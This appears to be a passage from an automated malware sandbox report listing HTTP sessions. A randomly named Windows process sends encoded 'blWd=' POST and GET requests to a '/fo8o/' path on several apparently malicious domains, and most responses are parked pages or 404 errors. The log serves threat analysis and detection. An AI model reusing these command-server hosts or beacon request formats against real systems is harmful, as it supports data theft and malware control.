            Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_sFpsoWOWjy1Gxf1qQL8nRHWE3XqoCsFsS/egTRN/i368LJ5yZAXBfyj82jILuQ+D8Y+4P6st/jpl25yMeYzRKw==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
            Aug 2, 2024 13:52:11.078296900 CEST | 1236 | IN | Data Ascii: on you're looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.
            Aug 2, 2024 13:52:11.078310013 CEST | 1236 | IN | Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
            Aug 2, 2024 13:52:11.078386068 CEST | 1236 | IN | Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
            Aug 2, 2024 13:52:11.078397036 CEST | 1236 | IN | Data Ascii: h:90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images
            Aug 2, 2024 13:52:11.078409910 CEST | 1236 | IN | Data Ascii: ve-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoratio
            Aug 2, 2024 13:52:11.078422070 CEST | 1236 | IN | Data Ascii: imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-contact-us__content{displ
            Aug 2, 2024 13:52:11.078608036 CEST | 1236 | IN | Data Ascii: }.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:15
            Aug 2, 2024 13:52:11.078624010 CEST | 1224 | IN | Data Ascii: r-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--second
            Aug 2, 2024 13:52:11.078635931 CEST | 1236 | IN | Data Ascii: dana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize"
            Aug 2, 2024 13:52:11.083412886 CEST | 723 | IN | Data Ascii: ype":5,"t":"content","pus":"ses=Y3JlPTE3MjI1OTk1MzAmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjZhY2M4NmFjNmZlYzguMTE5NjU5OTYmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTMmc2Vzc2lvbj02cmJhNW02YnFLTzVXVlUyZjVNcg==","postActionParameter":{"feedb


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            21 | 192.168.2.6 | 49749 | 15.197.172.60 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:16.461445093 CEST | 789 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.liangyuen528.com
            Origin: http://www.liangyuen528.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.liangyuen528.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Ascii: blWd=vggEebskLNQ+Yplwd46lYXbs83SFwBiVP5Ul6wM0dLYQ+0rvVKsvf7bRO0i4ju6aqcoyEZ1ssA/8SR8KXgo7IGFHyPnXTr1aF7cglRc787bVFdeWwGtOejkdMGFpQo6izkInybl0yCPo83L3oqULIEYSmtitC024jIVPISeMKa7pZEROn8Oy183oaRf4PlzqZsj+WanW6kkV


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            22 | 192.168.2.6 | 49750 | 15.197.172.60 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:19.005070925 CEST | 813 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.liangyuen528.com
            Origin: http://www.liangyuen528.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.liangyuen528.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Ascii: blWd=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5MQ9QvvUIEvY7bRaki5++6vqckQEbRssAb8SQgKXTA4JWFS7vnJM71aF7cglRJe87DVGuGWwjZNXDkaLGFpCY6mzkIVyZQvyBno83b3oY8ESUYu4tjyGXX2mrogWxahXYreVSQU7PORnsXqaTHKPFzAbsb+ENrx1QB2YKzGnCDRKLt4P3wWVKFm/w==


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            23 | 192.168.2.6 | 49751 | 15.197.172.60 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:22.081341982 CEST | 1826 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.liangyuen528.com
            Origin: http://www.liangyuen528.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.liangyuen528.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Ascii: blWd=vggEebskLNQ+ZJ1wfeylQXbtgnSFmxiRP5Yl60Ukd5UQ9j3vVpEvZ7bRZkiC++62qcMUEbt8sCz8SyoKRiA4QmFS2PnUTr0CF7MklRZe87DVGv2W5WtNVDkdMGEoQo6OzkAFyZE/zwHo/Wr378cEKEYo9tj6GXb9mr0WWyGLXYPeXSVRpMKx9OKHEjT3PhjvVNTSXf/R6EVJddPklT6vG4dIAwcBD5Jrp8WPbGSsc9V5aYQWdko1ZTFN7n3ouNRodfz/4wWss/LRz1RNv462vCB6EmCnmNDdb1TCPYRU28mkjERv8t/HpM8TolzavdfBRNXBApLvSFWanvw114cB4cUcKFmXik0jW9n0PdAnvswUY7/Qjff1VtHq8q0sA4p7yq1lEy+WHGDhX5HgbVAoigySwvvv7O70QBx6CflCAiO6/nYrk8uNDyZGSSnjRWUnzazmqOt+GtqwWGd3zTEGhzGVIuqsIveJwyb78IREtAWd3lTyVrqUs0ejk//4hb1/7m1seU5xEZCLn4jLMXgKcXWfBWR49h8kGeio0IHMrOJkY1hvNPX513kTa2RABaeszlUlAfp2OXLS7odx+n2fhMcdamP9XektedJXhjMCvSbPGpPO3IweHStAa5zvsHZPfH7QJkZEcbNXpMRbQ8E/PZjRoSh5AQzB/EVBNeP+B2qCU271qcBm64J7YEyFeWvAN6sDccBmEF3tyd8+w0mw0rCCcdZDYt5FkGkpVEBAy5eIelssM4OwMLFcJ9EL21dyymgI73ZeZDZBovifuazEeqibEVzTzmjE72nQFKh6k1dCU+MkiqwciyUH9nlAP1P91fIFYx/QiWO3RsrXz8CV8FjS1CVdj0pNFvJUlxw/hypZLRKxBAA2OpLo6ktOSejIL4rOG9C0A0gIYNsVezFe0N57p8lL5gA6G9UOc4XdZ1rpK/cr7YMWaGH7YNTxlbm1AqSkJKCQz++kuZcvIcUQ7CAdcfyuye/Fu9q0N79FYzJ0QBD [TRUNCATED]


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            24 | 192.168.2.6 | 49752 | 15.197.172.60 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:24.615874052 CEST | 527 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.liangyuen528.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:52:25.093091965 CEST | 414 | IN | HTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 02 Aug 2024 11:52:25 GMT
            Content-Type: text/html
            Content-Length: 274
            Connection: close
            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8="}</script></head></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            25 | 192.168.2.6 | 49753 | 66.29.149.46 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:30.152224064 CEST | 786 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.techchains.info
            Origin: http://www.techchains.info
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.techchains.info/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Ascii: blWd=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXItqzbiVtdgAMahkc1XFXjFNSszUmubz9HkSP9sNkAYTW
            Aug 2, 2024 13:52:30.815274000 CEST | 637 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:30 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            26 | 192.168.2.6 | 49756 | 66.29.149.46 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:32.696614981 CEST | 810 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.techchains.info
            Origin: http://www.techchains.info
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.techchains.info/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Ascii: blWd=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
            Aug 2, 2024 13:52:33.360078096 CEST | 637 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:33 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            27 | 192.168.2.6 | 49757 | 66.29.149.46 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:35.245125055 CEST | 1823 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.techchains.info
            Origin: http://www.techchains.info
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.techchains.info/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Ascii: blWd= [TRUNCATED]
            Aug 2, 2024 13:52:35.869472980 CEST | 637 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:35 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            28 | 192.168.2.6 | 49758 | 66.29.149.46 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:37.786711931 CEST | 526 | OUT | GET /fo8o/?blWd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.techchains.info
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:52:38.430005074 CEST | 652 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:38 GMT
            Server: Apache
            Content-Length: 493
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            29 | 192.168.2.6 | 49759 | 195.110.124.133 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:43.545048952 CEST | 804 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.elettrosistemista.zip
            Origin: http://www.elettrosistemista.zip
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.elettrosistemista.zip/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f
            Data Ascii: blWd=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
            Aug 2, 2024 13:52:44.273008108 CEST | 367 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:44 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            30 | 192.168.2.6 | 49760 | 195.110.124.133 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:46.090212107 CEST | 828 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.elettrosistemista.zip
            Origin: http://www.elettrosistemista.zip
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.elettrosistemista.zip/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d
            Data Ascii: blWd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
            Aug 2, 2024 13:52:46.775857925 CEST | 367 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:46 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
